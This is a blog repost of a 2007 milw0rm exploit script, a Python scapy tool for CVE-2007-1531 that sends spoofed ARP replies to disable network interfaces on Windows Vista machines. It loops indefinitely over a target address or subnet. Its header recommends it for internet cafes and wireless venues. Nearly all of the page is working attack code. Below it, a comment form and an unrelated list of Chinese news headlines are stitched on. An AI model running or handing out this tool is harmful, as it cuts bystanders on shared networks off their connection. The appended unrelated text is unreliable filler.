#!/usr/bin/env python
#
# :: Kristian Hermansen ::
# Date: 20070514
# Reference: CVE-2007-1531
# Description: Mcft Windows Vista (SP0) dumps interfaces when
# it receives this ARP packet.  This DoS is useful for an internet
# cafe, wireless venue, or legitimate local attack.  The victim will
# need to manually refresh their network interface.  OK, sure
# it's a dumb local attack, but why does Vista disable iface!?!??
# -> Thanks to Newsham / Hoagland
# Vulnerable: Mcft Windows Vista (SP0) [All Versions]
# Tested:
# * victim == Windows Vista Enterprise (SP0) [English]
# * attacker == Ubuntu Feisty (7.04)
# Usage: python fISTArp.py
# Depends: scapy.py
# [?] If you don't have scapy
# [+] wget //hg.secdev.org/scapy/raw-file/tip/scapy.py

from sys import argv
from os import geteuid
from scapy import Ether,ARP,send,srp,conf
from time import sleep

conf.verb = 0

def head():
   print """
                      __ ___ ____ _____  _                
                     / _|_ _/ ___|_   _|/ \   _ __ _ __  
                    | |_ | |\___ \ | | / _ \ | '__| '_ \
                    |  _|| | ___) || |/ ___ \| |  | |_) |
                    |_| |___|____/ |_/_/   \_\_|  | .__/
                                                  |_|    

   """

def isroot():
   if geteuid() != 0:
       print "TRY AGAIN AS ROOT SILLY..."
       return False
   else:
       return True

def usage():
   print "usage:", argv[0], ""
   print "examples:", argv[0], "192.168.1.100"
   print "examples:", argv[0], "192.168.1.0/24\n"

def fisting():
   arp_fist = ARP(pdst=argv[1],op=2)
   print "We are going to loop forever, CTRL-C to stop...\n"
   while True:
       sleep(3)
       for a in arp_fist:
           arping = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=a.pdst)
           ans,unans = srp(arping,timeout=0.1)
           if len(ans) == 1:
               a.psrc=a.pdst
               print a.pdst, "is ALIVE!"
               print "* Time to shut it down!"
               send(a)
               ans2,unans2 = srp(arping,timeout=0.1)
               if len(unans2) == 1:
                   print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                   print "@@@", a.psrc, "was rubber fisted!"
                   print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                   sleep(3)
               else:
                   print "FAILED:", a.pdst, "is still alive :-("
           else:
               print a.pdst, "is already DEAD!"
           print

head()
if isroot() != True:
   exit(1)
if len(argv) != 2:
   usage()
   exit(1)
else:
   fisting()

# u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st.

# milw0rm.com [2007-05-15]
Tags: ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(9660)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive
 
  • 革命家陈云的“五有”养生法 2019-05-21
  • 团市委组织召开区块链发展座谈会 助力西安打造“区块链之都” 2019-05-17
  • 2018年俄罗斯总统大选 2019-05-17
  • 组图:中国第一辆地铁列车时隔50年再度亮相 2019-05-17
  • 马拉维“红旗飘飘”十年间,中国工程印上了当地纸币 2019-05-13
  • 扶贫试点 保康县孩子过暖冬 2019-05-13
  • 不能让孩子输在起跑线上?来看看如何科学合理早教 2019-05-11
  • 从胡红岩到王天荣,还有多少人在无辜背案底 2019-05-11
  • 魔幻重庆的魔幻搭配 火锅竟和KTV配对 2019-05-07
  • 国际货币基金组织称土库曼斯坦缩减开支或让货币贬值 2019-05-02
  • 上饶经开区36个项目集中开工 总投资77.1亿元 2019-05-02
  • “她可能是张爱玲以后最好的中文写作者” 2019-05-02
  • 离婚案二审结束 王宝强疑与律师商讨后续应对措施 2019-04-11
  • 对中国人民而言,腐败就是从天上掉下来的,不是从人民群众中滋生出来的。 2019-04-09
  • 池州扶贫干部借“朋友圈”帮贫困户卖竹篮 2019-03-28
  • 255| 492| 809| 732| 747| 669| 156| 662| 993| 993|